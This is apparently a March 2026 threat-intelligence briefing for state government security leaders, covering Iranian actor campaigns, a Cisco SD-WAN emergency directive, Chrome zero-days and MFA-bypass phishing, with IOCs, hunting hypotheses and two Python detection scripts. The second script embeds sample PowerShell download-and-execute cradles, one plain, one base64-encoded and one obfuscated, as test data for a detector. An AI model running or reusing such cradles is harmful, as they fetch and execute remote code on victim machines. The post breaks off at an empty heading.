<p><em>What CIOs and CISOs of State Agencies Need to Know This Week About Converging Threats to Government IT, Critical Infrastructure, and Citizen Data</em></p>
<p>The threat environment facing U.S. state government IT organizations shifted materially in the first two weeks of March 2026. What was previously a strategic warning about Iranian retaliatory cyber operations following Operation Epic Fury (February 28) has now become confirmed, multi-vector offensive activity — with U.S. airports, banks, medical technology companies, and software firms already compromised. Simultaneously, CISA issued an emergency directive over actively exploited Cisco SD-WAN vulnerabilities, Google patched two zero-day Chrome flaws under active exploitation, and a new phishing-as-a-service platform emerged that defeats multi-factor authentication on Microsoft 365.</p>
<p>For state CIOs and CISOs, the convergence is stark: the same infrastructure types your agencies operate — enterprise IT, building management systems, airports, citizen-facing web services — are being actively targeted by nation-state actors and criminal operators right now.</p>
<p><strong>This post covers what changed, who is behind it, what to expect next, and exactly what your teams should do about it — organized by urgency.</strong></p>
<h2>What Changed: The Week of March 3–15, 2026</h2>
<p>Seven developments in the past two weeks fundamentally altered the risk calculus for state government IT:</p>
<ol> <li><strong>Iran's MuddyWater breached a U.S. airport, bank, and software company</strong> using a new custom backdoor called <strong>Dindoor</strong> — confirming that Iranian intelligence operations have moved from posturing to active network penetration of U.S. entities.</li> <li><strong>The pro-Iranian group Handala executed a devastating wiper attack on Stryker Corporation</strong>, claiming 200,000 devices were erased. This is the same group that previously weaponized Microsoft Intune (MDM) to deploy wipers — a technique directly relevant to any organization using Intune for endpoint management.</li> <li><strong>CISA issued Emergency Directive ED 26-03</strong> over two actively exploited Cisco Catalyst SD-WAN Manager vulnerabilities (<strong>CVE-2026-20122</strong> and <strong>CVE-2026-20128</strong>), with exploitation attributed to "highly sophisticated" actors.</li> <li><strong>Google released an emergency Chrome 146 update</strong> patching two zero-day vulnerabilities (in the Skia graphics engine and V8 JavaScript engine) under active exploitation — affecting every Chrome browser on every state employee workstation.</li> <li><strong>A new phishing-as-a-service platform called "Starkiller"</strong> emerged as the successor to the recently dismantled Tycoon2FA, featuring live adversary-in-the-middle reverse proxying and <strong>OAuth device code abuse</strong> that bypasses MFA — including conditional access policies that rely on device compliance.</li> <li><strong>Ransomware groups Qilin and Interlock continue to actively target government entities</strong>, with Interlock deploying AI-generated malware variants and recent municipal incidents in Connecticut underscoring that state and local government remains a primary ransomware target.</li> <li><strong>CISA published five ICS/BMS advisories in a single week</strong> covering Honeywell, Trane, Siemens, and Ignition SCADA systems — all commonly deployed in state government facilities — signaling 
elevated risk to operational technology environments.</li>
</ol>
<h2>Threat Timeline</h2>
<table> <tbody> <tr> <td> <p><strong>Date</strong></p> </td> <td> <p><strong>Event</strong></p> </td> <td> <p><strong>Significance</strong></p> </td> </tr> <tr> <td> <p>2026-02-19</p> </td> <td> <p>Starkiller PhaaS platform identified by Abnormal AI; reported by Dark Reading, Krebs on Security</p> </td> <td> <p>Successor to Tycoon2FA with MFA-bypass capabilities targeting Microsoft 365</p> </td> </tr> <tr> <td> <p>2026-02-25</p> </td> <td> <p>Cisco publishes advisories for CVE-2026-20122 and CVE-2026-20128</p> </td> <td> <p>SD-WAN Manager API file overwrite and credential exposure vulnerabilities</p> </td> </tr> <tr> <td> <p>2026-02-26</p> </td> <td> <p>CISA issues initial Emergency Directive ED 26-03 for Cisco SD-WAN</p> </td> <td> <p>Federal agencies ordered to patch; signals severity for all government users</p> </td> </tr> <tr> <td> <p>2026-02-28</p> </td> <td> <p>Operation Epic Fury — U.S. kinetic strikes on Iranian IRGC targets</p> </td> <td> <p>Triggers retaliatory cyber posture from Iranian state and proxy actors</p> </td> </tr> <tr> <td> <p>2026-03-03</p> </td> <td> <p>FBI issues reminder to critical infrastructure organizations on Iranian retaliation</p> </td> <td> <p>State governments explicitly named as potential targets</p> </td> </tr> <tr> <td> <p>2026-03-05</p> </td> <td> <p>MuddyWater breaches U.S. bank, airport, non-profit, and software company using Dindoor backdoor</p> </td> <td> <p>Confirmed Iranian espionage operations inside U.S. 
networks</p> </td> </tr> <tr> <td> <p>2026-03-10</p> </td> <td> <p>CISA publishes ICS advisories for Honeywell IQ4x BMS, Trane Tracer, Siemens SIMATIC, Ignition SCADA</p> </td> <td> <p>Five ICS/BMS advisories in one week — all common in state government facilities</p> </td> </tr> <tr> <td> <p>2026-03-11</p> </td> <td> <p>Handala wiper attack on Stryker Corporation; 200,000 devices claimed wiped</p> </td> <td> <p>Escalation of Iranian destructive operations against U.S.-allied companies</p> </td> </tr> <tr> <td> <p>2026-03-12</p> </td> <td> <p>CISA issues supplemental hunt-and-hardening guidance for Cisco SD-WAN</p> </td> <td> <p>Confirms "widely exploited" status; nation-state attribution implied</p> </td> </tr> <tr> <td> <p>2026-03-13</p> </td> <td> <p>Google releases emergency Chrome 146 update for two actively exploited zero-days</p> </td> <td> <p>All Chrome-based browsers on state endpoints require immediate patching</p> </td> </tr> <tr> <td> <p>2026-03-15</p> </td> <td> <p>GovTech reports: "New Federal Strategies, Rising Risk From Iran Top Cyber Themes"</p> </td> <td> <p>Public-sector conference confirms Iranian cyber threat as top government concern</p> </td> </tr> </tbody>
</table>
<h2>Threat Analysis</h2>
<h3>1. Iranian Multi-Vector Retaliation: Three Actor Groups, One Strategic Objective</h3>
<p>The Iranian cyber threat to U.S. state government has matured from theoretical to operational. Three distinct Iranian actor groups are now conducting confirmed operations against U.S. targets:</p>
<p><strong>MuddyWater</strong> (aliases: Mango Sandstorm, Static Kitten, TA450, Seedworm, MERCURY, Boggy Serpens, COBALT ULSTER, Earth Vetala, TEMP.Zagros) — Iran's Ministry of Intelligence and Security (MOIS) espionage unit. MuddyWater's deployment of the <strong>Dindoor</strong> backdoor (also tracked as <strong>Tsundere</strong>) into U.S. networks — including an airport, which is often a state or local government entity — represents a direct threat to state IT environments. MuddyWater is known for targeting government, energy, financial services, aerospace, defense, education, and telecommunications sectors across 45+ countries. Their signature tradecraft includes heavy use of PowerShell, living-off-the-land techniques, and custom C2 infrastructure.</p>
<p><strong>Handala</strong> (aliases: Void Manticore, Banished Kitten, Storm-842, Red Sandstorm, UNC5203, KarMa, HomeLandJustice) — An MOIS-affiliated destructive operations group operating under the cover of pro-Palestinian hacktivism. Their malware arsenal includes the <strong>Handala Wiper</strong> (MBR-based), <strong>CaddyWiper</strong>, <strong>ZeroCleare</strong>, and a newer <strong>AI-assisted PowerShell wiper</strong>. They also deploy the commercial infostealer <strong>Rhadamanthys</strong>. The Stryker attack demonstrates their willingness and capability to inflict mass destruction on U.S.-allied organizations. Their documented technique of weaponizing <strong>Microsoft Intune</strong> to deploy wipers is particularly alarming for any organization using MDM for endpoint management.</p>
<p><strong>The broader Iranian cyber apparatus</strong> — Intelligence reporting describes a systematic framework within Iranian cyber operations where espionage teams (such as APT34/OilRig, affiliated with MOIS) establish initial access, then hand off victims to destruction teams (Handala/Banished Kitten, MOIS-affiliated) for wiper deployment and psychological operations. This "access-then-destroy" pipeline means that a quiet espionage intrusion today could become a destructive wiper attack tomorrow.</p>
<p><strong>Why this matters for state government:</strong> State agencies operate the same categories of infrastructure being actively targeted — airports, building management systems, enterprise IT with Microsoft 365 and Intune, VPN concentrators, and SCADA/ICS for water and transportation. The FBI's March 3 reminder explicitly named state governments as potential targets for Iranian retaliation.</p>
<h3>2. Cisco SD-WAN: Emergency Directive With Nation-State Implications</h3>
<p>CISA's Emergency Directive ED 26-03 addresses two vulnerabilities in Cisco Catalyst SD-WAN Manager that are under active exploitation:</p>
<table> <tbody> <tr> <td> <p><strong>CVE</strong></p> </td> <td> <p><strong>CVSS</strong></p> </td> <td> <p><strong>Description</strong></p> </td> <td> <p><strong>Risk</strong></p> </td> </tr> <tr> <td> <p><strong>CVE-2026-20128</strong></p> </td> <td> <p>7.5 (HIGH)</p> </td> <td> <p>Data Collection Agent credential file exposure — allows authenticated attacker to read DCA passwords and pivot to other systems</p> </td> <td> <p>Lateral movement enabler</p> </td> </tr> <tr> <td> <p><strong>CVE-2026-20122</strong></p> </td> <td> <p>5.4 (MEDIUM)</p> </td> <td> <p>API file overwrite — allows authenticated attacker to overwrite arbitrary files and gain vmanage privileges</p> </td> <td> <p>Privilege escalation</p> </td> </tr> </tbody>
</table>
<p>While the individual CVSS scores appear moderate, the chained exploitation of these vulnerabilities by "highly sophisticated" actors (SecurityWeek's characterization) suggests nation-state-level operations. The CISA emergency directive — a tool reserved for the most urgent threats — applies to federal agencies but signals the severity for all government users. <strong>Systems running Cisco Catalyst SD-WAN Manager below version 20.18 are affected.</strong></p>
<h3>3. Chrome Zero-Days: Universal Endpoint Exposure</h3>
<p>Google's emergency Chrome 146 release (version 146.0.7680.75/76) patches two zero-day vulnerabilities under active exploitation:</p>
<ul> <li><strong>Skia graphics engine flaw</strong> — enables remote code execution within the browser sandbox</li> <li><strong>V8 JavaScript engine flaw</strong> — enables sensitive information disclosure</li>
</ul>
<p>With Chrome as the dominant browser across government endpoints, every state employee workstation is a potential attack surface. These vulnerabilities enable <strong>drive-by compromise</strong> (MITRE ATT&CK T1189) — a user simply visiting a malicious or compromised website can be exploited without any additional interaction.</p>
<h3>4. Starkiller PhaaS: MFA Is No Longer Enough</h3>
<p>The Europol-led takedown of the Tycoon2FA phishing platform in early March created a temporary disruption in the adversary-in-the-middle (AitM) phishing ecosystem. That gap has already been filled. <strong>Starkiller</strong>, documented by Krebs on Security, Dark Reading, and Abnormal AI, offers:</p>
<ul> <li><strong>Live reverse proxying</strong> of real login pages (not static clones) — making phishing pages virtually indistinguishable from legitimate ones</li> <li><strong>Real-time MFA token interception</strong> — capturing and replaying session cookies as users authenticate</li> <li><strong>OAuth device code abuse</strong> — a technique that hijacks Microsoft 365 accounts by exploiting the device code authentication flow, bypassing conditional access policies that rely on device compliance</li>
</ul>
<p>For state agencies running Microsoft 365 and Azure AD (Entra ID), the OAuth device code vector is particularly dangerous. Many state tenants rely on conditional access policies that check device compliance — Starkiller's OAuth abuse circumvents this entirely.</p>
<h3>5. Ransomware: Qilin and Interlock Continue Targeting Government</h3>
<p>The <strong>Qilin</strong> ransomware operation (also tracked as AGENDA, AGENDA.RUST) continues to target government, healthcare, manufacturing, and transportation sectors. Qilin claimed Tulsa International Airport in February and was linked to over 1,000 breaches in 2025. The <strong>Interlock</strong> ransomware group (tracked via Hive0163) is deploying AI-generated malware variants (<strong>Slopoly</strong>) that lower the barrier for less-skilled operators. Recent municipal ransomware incidents in Connecticut (New Britain, Meriden) underscore that state and local government remains a primary target.</p>
<h3>6. ICS/Building Management: Five CISA Advisories in One Week</h3>
<p>The week of March 10 saw an unusual concentration of CISA ICS advisories affecting systems commonly deployed in state government facilities:</p>
<table> <tbody> <tr> <td> <p><strong>System</strong></p> </td> <td> <p><strong>Advisory</strong></p> </td> <td> <p><strong>Relevance to State Government</strong></p> </td> </tr> <tr> <td> <p><strong>Honeywell IQ4x BMS</strong></p> </td> <td> <p>ICSA-26-069-03</p> </td> <td> <p>Building automation controllers in state office buildings</p> </td> </tr> <tr> <td> <p><strong>Trane Tracer HVAC</strong></p> </td> <td> <p>CISA ICS advisory</p> </td> <td> <p>HVAC management in state facilities</p> </td> </tr> <tr> <td> <p><strong>Siemens SIMATIC</strong></p> </td> <td> <p>CISA ICS advisory</p> </td> <td> <p>Industrial control systems in state-operated utilities</p> </td> </tr> <tr> <td> <p><strong>Siemens RUGGEDCOM APE1808</strong></p> </td> <td> <p>CISA ICS advisory</p> </td> <td> <p>References FortiOS vulnerabilities in industrial products</p> </td> </tr> <tr> <td> <p><strong>Ignition SCADA</strong></p> </td> <td> <p>CISA ICS advisory</p> </td> <td> <p>SCADA systems for water/wastewater treatment</p> </td> </tr> </tbody>
</table>
<p>State agencies operating water treatment facilities, building management systems, or transportation infrastructure should treat these advisories as high-priority.</p>
<h2>Predictive Analysis: What to Expect in the Next 14–30 Days</h2>
<table> <tbody> <tr> <td> <p><strong>Scenario</strong></p> </td> <td> <p><strong>Probability</strong></p> </td> <td> <p><strong>Basis</strong></p> </td> </tr> <tr> <td> <p>Additional Iranian retaliatory cyber operations against U.S. government and critical infrastructure entities</p> </td> <td> <p><strong>70%</strong></p> </td> <td> <p>Three Iranian actor groups already active; FBI warning issued; Operation Epic Fury escalation trajectory</p> </td> </tr> <tr> <td> <p>Starkiller PhaaS campaigns targeting government Microsoft 365 tenants within 30 days</p> </td> <td> <p><strong>60%</strong></p> </td> <td> <p>Platform is commercially available; Tycoon2FA customer base migrating; government M365 tenants are high-value targets</p> </td> </tr> <tr> <td> <p>Cisco SD-WAN exploitation attributed to a nation-state actor within 14 days</p> </td> <td> <p><strong>50%</strong></p> </td> <td> <p>CISA emergency directive language and "highly sophisticated" characterization suggest classified attribution exists</p> </td> </tr> <tr> <td> <p>Wiper attack against a U.S. state or local government entity within 30 days</p> </td> <td> <p><strong>40%</strong></p> </td> <td> <p>Handala's expanding target scope (from Israel-focused to U.S. companies); MDM-based deployment technique applicable to any Intune environment</p> </td> </tr> <tr> <td> <p>Exploitation of ICS/BMS vulnerabilities in state government facilities</p> </td> <td> <p><strong>30%</strong></p> </td> <td> <p>Five advisories in one week; Iranian actors have demonstrated OT interest; but exploitation requires specialized access</p> </td> </tr> </tbody>
</table>
<h2>SOC Operational Guidance</h2>
<h3>Priority Hunting Hypotheses</h3>
<table> <tbody> <tr> <td> <p><strong>#</strong></p> </td> <td> <p><strong>Hypothesis</strong></p> </td> <td> <p><strong>ATT&CK Technique</strong></p> </td> <td> <p><strong>Data Source</strong></p> </td> <td> <p><strong>Priority</strong></p> </td> </tr> <tr> <td> <p>1</p> </td> <td> <p>Iranian actors have established persistence via PowerShell-based backdoors (Dindoor/Tsundere pattern)</p> </td> <td> <p>T1059.001 (PowerShell), T1071.001 (Web C2), T1105 (Ingress Tool Transfer)</p> </td> <td> <p>EDR telemetry, PowerShell script block logging, proxy logs</p> </td> <td> <p><strong>CRITICAL</strong></p> </td> </tr> <tr> <td> <p>2</p> </td> <td> <p>Adversary has abused OAuth device code flow to hijack M365 accounts</p> </td> <td> <p>T1528 (Steal Application Access Token), T1078.004 (Cloud Accounts)</p> </td> <td> <p>Azure AD sign-in logs — filter for deviceCode grant type from unexpected geolocations</p> </td> <td> <p><strong>HIGH</strong></p> </td> </tr> <tr> <td> <p>3</p> </td> <td> <p>MDM (Intune) has been used to deploy unauthorized applications or scripts</p> </td> <td> <p>T1072 (Software Deployment Tools), T1078 (Valid Accounts)</p> </td> <td> <p>Intune audit logs, application deployment history, compliance policy changes</p> </td> <td> <p><strong>HIGH</strong></p> </td> </tr> <tr> <td> <p>4</p> </td> <td> <p>Cisco SD-WAN Manager API has been accessed by unauthorized users or from unexpected IPs</p> </td> <td> <p>T1190 (Exploit Public-Facing Application), T1552.001 (Credentials in Files)</p> </td> <td> <p>SD-WAN Manager access logs, API audit trails</p> </td> <td> <p><strong>HIGH</strong></p> </td> </tr> <tr> <td> <p>5</p> </td> <td> <p>Session cookie replay from non-standard geolocations indicating AitM phishing success</p> </td> <td> <p>T1539 (Steal Web Session Cookie), T1557 (Adversary-in-the-Middle)</p> </td> <td> <p>Azure AD sign-in logs — impossible travel, token replay detection</p> </td> <td> <p><strong>MEDIUM</strong></p> </td> </tr> </tbody>
</table>
<h3>Prioritized IOCs for Monitoring</h3>
<p><strong>MuddyWater C2 Infrastructure</strong> (historical, high-confidence — monitor for any connection attempts):</p>
<table> <tbody> <tr> <td> <p><strong>IOC</strong></p> </td> <td> <p><strong>Type</strong></p> </td> <td> <p><strong>Context</strong></p> </td> <td> <p><strong>Confidence</strong></p> </td> </tr> <tr> <td> <p>193.109.120[.]59</p> </td> <td> <p>IPv4</p> </td> <td> <p>MuddyWater/DarkBeatC2 infrastructure (BlueVPS, Estonia)</p> </td> <td> <p>High</p> </td> </tr> <tr> <td> <p>5.252.23[.]52</p> </td> <td> <p>IPv4</p> </td> <td> <p>MuddyWater/DarkBeatC2 infrastructure (Stark Industries, Slovakia)</p> </td> <td> <p>High</p> </td> </tr> </tbody>
</table>
<p><strong>Malware families to detect:</strong></p>
<ul> <li><strong>Dindoor / Tsundere</strong> (ThreatStream ID: 900997) — MuddyWater's new custom backdoor. Request full IOC package from your threat intelligence provider.</li> <li><strong>Handala Wiper</strong> — MBR-based wiper; <strong>CaddyWiper</strong>; <strong>ZeroCleare</strong> — known Handala/Void Manticore destructive tools</li> <li><strong>Rhadamanthys</strong> — commercial infostealer deployed by Handala for credential harvesting</li> <li><strong>Slopoly</strong> — AI-generated malware variant associated with Hive0163/Interlock ransomware operations</li>
</ul>
<p><strong>Domains to block:</strong></p>
<ul> <li>handala-hack[.]to — Handala data leak site</li> <li>handala-alert[.]to — Handala news/propaganda site</li> <li>handala-redwanted[.]to — Handala targeting/doxing site</li>
</ul>
<h3>Detection Engineering Priorities</h3>
<ol> <li><strong>Azure AD / Entra ID:</strong> Create alerts for OAuth device code authentication (grant_type=urn:ietf:params:oauth:grant-type:device_code) from any user not explicitly authorized for device code flow. Correlate with impossible travel and new device registrations.</li> <li><strong>PowerShell monitoring:</strong> Ensure Script Block Logging (Event ID 4104) and Module Logging are enabled. Alert on obfuscated PowerShell execution, encoded commands (-enc), and download cradles (Invoke-WebRequest, Net.WebClient).</li> <li><strong>Intune/MDM:</strong> Monitor for new application deployments, compliance policy modifications, and configuration profile changes outside of approved change windows.</li> <li><strong>Network edge:</strong> Monitor Cisco SD-WAN Manager API access logs for unusual file operations, credential file access, and authentication from unexpected sources.</li> <li><strong>Chrome version compliance:</strong> Use your endpoint management platform to verify Chrome 146.0.7680.75+ deployment across all managed endpoints. Flag any endpoints running older versions as non-compliant.</li>
</ol>
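<p>Hunting hypotheses 2 and 5 in the table above and detection priority 1 in this list, worked as an added example in Python; this is not code from this post or from Microsoft. It assumes the Entra ID SigninLogs field names used in the constructed sample records (authenticationProtocol, createdDateTime, location.geoCoordinates, status.errorCode), a constructed allowlist of service accounts approved for device code flow, and a 900 km/h plausibility threshold for impossible travel.</p>

```python
"""Hunt Entra ID sign-in records for OAuth device code logins and impossible travel.

Added example for this post, not the post's or Microsoft's code. Assumes the
Entra ID SigninLogs field names used below; verify them against your own export.
"""
from datetime import datetime
from math import asin, cos, radians, sin, sqrt

# The grant the post names (grant_type=urn:ietf:params:oauth:grant-type:device_code)
# appears in the sign-in logs as authenticationProtocol == "deviceCode".
DEVICE_CODE_PROTOCOL = "deviceCode"
AUTHORIZED_DEVICE_CODE_USERS = {"svc-lobbykiosk@example-state.gov"}  # constructed allowlist
MAX_PLAUSIBLE_KMH = 900.0   # faster than an airliner between two sign-ins is replay, not travel
MIN_DISTANCE_KM = 100.0     # ignore geolocation jitter inside one metro area


def _rec(user, ts, proto, ip, country, lat, lon, error_code=0):
    """Build one constructed sign-in record in the assumed schema."""
    return {"userPrincipalName": user, "createdDateTime": ts, "ipAddress": ip,
            "authenticationProtocol": proto, "status": {"errorCode": error_code},
            "location": {"countryOrRegion": country,
                         "geoCoordinates": {"latitude": lat, "longitude": lon}}}


# Constructed sample: alice signs in normally from Hartford, then a device code login
# succeeds from Amsterdam 12 minutes later; the kiosk account is approved for device code;
# carol's device code attempt fails (50126, bad password); bob never leaves Hartford.
SAMPLE_SIGNINS = [
    _rec("alice@example-state.gov", "2026-03-12T13:50:00Z", "none", "198.51.100.7", "US", 41.7658, -72.6734),
    _rec("alice@example-state.gov", "2026-03-12T14:02:10Z", DEVICE_CODE_PROTOCOL, "203.0.113.10", "NL", 52.3676, 4.9041),
    _rec("svc-lobbykiosk@example-state.gov", "2026-03-12T08:00:00Z", DEVICE_CODE_PROTOCOL, "198.51.100.9", "US", 41.7658, -72.6734),
    _rec("carol@example-state.gov", "2026-03-12T09:15:00Z", DEVICE_CODE_PROTOCOL, "203.0.113.44", "DE", 50.1109, 8.6821, 50126),
    _rec("bob@example-state.gov", "2026-03-12T09:00:00Z", "none", "198.51.100.8", "US", 41.7658, -72.6734),
    _rec("bob@example-state.gov", "2026-03-12T12:00:00Z", "none", "198.51.100.8", "US", 41.7701, -72.6800),
]


def haversine_km(lat1, lon1, lat2, lon2):
    """Great-circle distance in kilometres."""
    lat1, lon1, lat2, lon2 = map(radians, (lat1, lon1, lat2, lon2))
    a = sin((lat2 - lat1) / 2) ** 2 + cos(lat1) * cos(lat2) * sin((lon2 - lon1) / 2) ** 2
    return 2 * 6371.0 * asin(sqrt(a))


def _ts(rec):
    return datetime.fromisoformat(rec["createdDateTime"].replace("Z", "+00:00"))


def _coords(rec):
    geo = rec.get("location", {}).get("geoCoordinates") or {}
    return (geo["latitude"], geo["longitude"]) if "latitude" in geo else None


def device_code_findings(records, allowlist=AUTHORIZED_DEVICE_CODE_USERS):
    """Every device code sign-in by a user not on the allowlist; success raises severity."""
    findings = []
    for rec in records:
        user = rec["userPrincipalName"]
        if rec.get("authenticationProtocol") != DEVICE_CODE_PROTOCOL or user in allowlist:
            continue
        succeeded = rec.get("status", {}).get("errorCode") == 0
        findings.append({"type": "device_code_signin", "user": user,
                         "ip": rec.get("ipAddress"), "time": rec["createdDateTime"],
                         "country": rec.get("location", {}).get("countryOrRegion"),
                         "severity": "high" if succeeded else "medium"})
    return findings


def impossible_travel_findings(records, max_kmh=MAX_PLAUSIBLE_KMH):
    """Consecutive successful sign-ins per user that imply an implausible travel speed."""
    by_user = {}
    for rec in records:
        if rec.get("status", {}).get("errorCode") == 0 and _coords(rec):
            by_user.setdefault(rec["userPrincipalName"], []).append(rec)
    findings = []
    for user, recs in by_user.items():
        recs.sort(key=_ts)
        for prev, cur in zip(recs, recs[1:]):
            km = haversine_km(*_coords(prev), *_coords(cur))
            hours = max((_ts(cur) - _ts(prev)).total_seconds() / 3600, 1 / 3600)
            if km >= MIN_DISTANCE_KM and km / hours > max_kmh:
                findings.append({"type": "impossible_travel", "user": user,
                                 "from_ip": prev.get("ipAddress"), "to_ip": cur.get("ipAddress"),
                                 "km": round(km), "kmh": round(km / hours),
                                 "time": cur["createdDateTime"], "severity": "high"})
    return findings


def run_hunt(records=SAMPLE_SIGNINS):
    """Run both hunts; a user hit by both is the strongest AitM/device-code signal."""
    findings = device_code_findings(records) + impossible_travel_findings(records)
    kinds = {}
    for f in findings:
        kinds.setdefault(f["user"], set()).add(f["type"])
    for f in findings:
        if len(kinds[f["user"]]) == 2:
            f["severity"] = "critical"
    return findings
```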
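<p>Hunting hypothesis 1 and detection priority 2 (Script Block Logging, encoded commands, download cradles), worked as an added example in Python over constructed Event ID 4104 records; this is not code from this post or from Microsoft. It assumes the events arrive as dicts with the 4104 fields EventID, Computer, Path and ScriptBlockText, and the obfuscation markers and alert threshold are the example's own heuristics.</p>

```python
"""Triage PowerShell Script Block Logging events (Event ID 4104) for the tradecraft
the post lists: encoded commands, download cradles and obfuscation.

Added example for this post, not the post's or Microsoft's code. Assumes events
are dicts carrying the 4104 fields EventID, Computer, Path and ScriptBlockText
as forwarded from Microsoft-Windows-PowerShell/Operational by your SIEM agent.
"""
import base64
import re

# -e / -ec / -enc / -EncodedCommand followed by a base64 blob (UTF-16LE text once decoded).
ENCODED_FLAG = re.compile(r"-e(?:c|n[a-z]*)?\s+([A-Za-z0-9+/]{16,}={0,2})", re.IGNORECASE)
# Download cradles named in the detection priorities above, plus their common aliases.
CRADLES = {
    "Invoke-WebRequest": re.compile(r"Invoke-WebRequest|\biwr\b|\bwget\b|\bcurl\b", re.I),
    "Net.WebClient": re.compile(r"Net\.WebClient|DownloadString|DownloadFile", re.I),
    "Invoke-RestMethod": re.compile(r"Invoke-RestMethod|\birm\b", re.I),
    "BITS": re.compile(r"Start-BitsTransfer", re.I),
}
# Crude obfuscation markers: backticks, [char] casts, string splicing, -join, base64 helpers.
OBFUSCATION_MARKERS = [re.compile(p) for p in (r"`", r"\[char\]", r"'\s*\+\s*'", r"-join\b",
                                                r"FromBase64String", r"\{\d+\}")]
OBFUSCATION_ALERT_SCORE = 3  # heuristic threshold chosen for this example

# Constructed sample events (not real telemetry). The second spawns a nested encoded
# PowerShell; the third splices the cmdlet name so a plain cradle regex misses it.
SAMPLE_CRADLE = "IEX (New-Object Net.WebClient).DownloadString('http://203.0.113.5/x.ps1')"
SAMPLE_ENCODED = base64.b64encode(SAMPLE_CRADLE.encode("utf-16-le")).decode()
SAMPLE_OBFUSCATED = ("$u=('Inv'+'oke-Web'+'Req'+'uest'); $p=[char]104+[char]116+[char]116+[char]112; "
                     "& $u -Uri ($p+'://203.0.113.5/x')")
SAMPLE_EVENTS = [
    {"EventID": 4104, "Computer": "WS-0142", "Path": "C:\\Scripts\\rotate-logs.ps1",
     "ScriptBlockText": "Get-ChildItem C:\\Logs | Where-Object Length -gt 1MB | Remove-Item"},
    {"EventID": 4104, "Computer": "WS-0142", "Path": "",
     "ScriptBlockText": f"Start-Process powershell.exe -ArgumentList '-nop -w hidden -enc {SAMPLE_ENCODED}'"},
    {"EventID": 4104, "Computer": "WS-0213", "Path": "", "ScriptBlockText": SAMPLE_OBFUSCATED},
    {"EventID": 4103, "Computer": "WS-0213", "Path": "", "ScriptBlockText": "Get-Date"},
]


def decode_encoded_command(text):
    """Return the decoded -EncodedCommand payload, or None when absent or not valid base64/UTF-16."""
    m = ENCODED_FLAG.search(text)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None


def obfuscation_score(text):
    """Count obfuscation markers; a rough signal for review priority, not a verdict."""
    return sum(len(p.findall(text)) for p in OBFUSCATION_MARKERS)


def triage_event(event):
    """Classify one 4104 event; returns None when nothing in it warrants an alert."""
    if event.get("EventID") != 4104:
        return None
    raw = event.get("ScriptBlockText", "")
    decoded = decode_encoded_command(raw)
    # Scan the decoded payload and the raw block with the base64 blob removed, so the
    # blob itself cannot produce accidental pattern hits.
    surfaces = [ENCODED_FLAG.sub("-enc <blob>", raw)] + ([decoded] if decoded else [])
    reasons = {"encoded_command"} if decoded is not None else set()
    for name, pattern in CRADLES.items():
        if any(pattern.search(s) for s in surfaces):
            reasons.add(f"download_cradle:{name}")
    score = max(obfuscation_score(s) for s in surfaces)
    if score >= OBFUSCATION_ALERT_SCORE:
        reasons.add(f"obfuscation_score:{score}")
    if not reasons:
        return None
    return {"computer": event.get("Computer"), "path": event.get("Path") or "<interactive>",
            "reasons": sorted(reasons), "decoded": decoded}


def triage_events(events=SAMPLE_EVENTS):
    """Triage a batch and keep only the events that produced reasons."""
    return [r for r in (triage_event(e) for e in events) if r]
```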
<h2>Sector-Specific Defensive Priorities</h2>
<h3>State Government Agencies (Executive Branch IT)</h3>
<ul> <li><strong>Immediate:</strong> Block OAuth device code flow in Entra ID conditional access unless explicitly required by specific applications. Audit the last 30 days of device code authentications.</li> <li><strong>Immediate:</strong> Push Chrome 146 to all managed endpoints via SCCM/Intune within 48 hours.</li> <li><strong>7-day:</strong> Conduct retroactive SIEM hunt for MuddyWater/Dindoor indicators (PowerShell-based C2, connections to known MuddyWater infrastructure).</li> <li><strong>7-day:</strong> Verify Intune hardening — restrict application deployment to approved administrators only; enable BitLocker recovery key escrow; audit compliance policy change history.</li> <li><strong>30-day:</strong> Conduct tabletop exercise for Iranian wiper scenario targeting state IT via MDM or VPN compromise.</li>
</ul>
<h3>Financial Services (State Treasury, Revenue, Payment Processing)</h3>
<ul> <li><strong>Immediate:</strong> Alert on Starkiller-pattern AitM phishing — session cookie replay, impossible travel in M365 sign-in logs.</li> <li><strong>7-day:</strong> Review third-party payment processor security posture (BridgePay-type vendor risk). Ransomware attacks on payment vendors can disrupt state revenue collection.</li> <li><strong>7-day:</strong> Hunt for MuddyWater indicators — a U.S. bank was among confirmed Dindoor victims.</li> <li><strong>30-day:</strong> Evaluate FIDO2/passkey deployment for high-privilege financial system accounts.</li>
</ul>
<h3>Energy & Water Utilities (State-Operated or Overseen)</h3>
<ul> <li><strong>Immediate:</strong> Inventory all Honeywell IQ4x BMS controllers, Trane Tracer HVAC systems, Siemens SIMATIC PLCs, and Ignition SCADA deployments. Apply CISA ICS advisory mitigations.</li> <li><strong>7-day:</strong> Verify network segmentation between IT and OT environments. Iranian actors conducting pre-positioning operations target the IT/OT boundary.</li> <li><strong>7-day:</strong> Review FortiOS versions on any FortiGate appliances protecting OT networks — the Siemens RUGGEDCOM advisory references FortiOS vulnerabilities in industrial products.</li> <li><strong>30-day:</strong> Evaluate dedicated OT threat intelligence subscription (e.g., Dragos WorldView) to close visibility gaps in industrial control system threats.</li>
</ul>
<h3>Healthcare (State Medicaid, Public Health, State Hospitals)</h3>
<ul> <li><strong>Immediate:</strong> The Handala wiper attack on Stryker Corporation (medical technology) demonstrates that healthcare-adjacent organizations are in the Iranian target set. Review MDM security posture for any state health agency using Intune.</li> <li><strong>7-day:</strong> Ensure Qilin/AGENDA ransomware detection signatures are current — healthcare is a primary Qilin target sector.</li> <li><strong>7-day:</strong> Audit PII repositories (Medicaid, public health records) for access anomalies — these datasets are high-value targets for both espionage and ransomware operators.</li> <li><strong>30-day:</strong> Review incident response plans for destructive attack scenarios (wiper, not just ransomware).</li>
</ul>
<h3>Aviation & Transportation (State DOT, State-Managed Airports)</h3>
<ul> <li><strong>Immediate:</strong> MuddyWater's confirmed breach of a U.S. airport makes this sector a top priority. Hunt for Dindoor/Tsundere indicators in airport and DOT network environments.</li> <li><strong>7-day:</strong> Review Cisco SD-WAN deployments in transportation management systems. If running SD-WAN Manager below version 20.18, initiate emergency patching.</li> <li><strong>7-day:</strong> Audit VPN access logs for transportation management and traffic control systems — credential theft targeting VPN infrastructure is an active threat.</li> <li><strong>30-day:</strong> Assess physical security implications of cyber compromise to transportation SCADA systems (traffic management, bridge controls, tunnel ventilation).</li>
</ul>
<h2>Prioritized Defense Recommendations</h2>
<h3>🔴 Immediate (24–48 Hours)</h3>
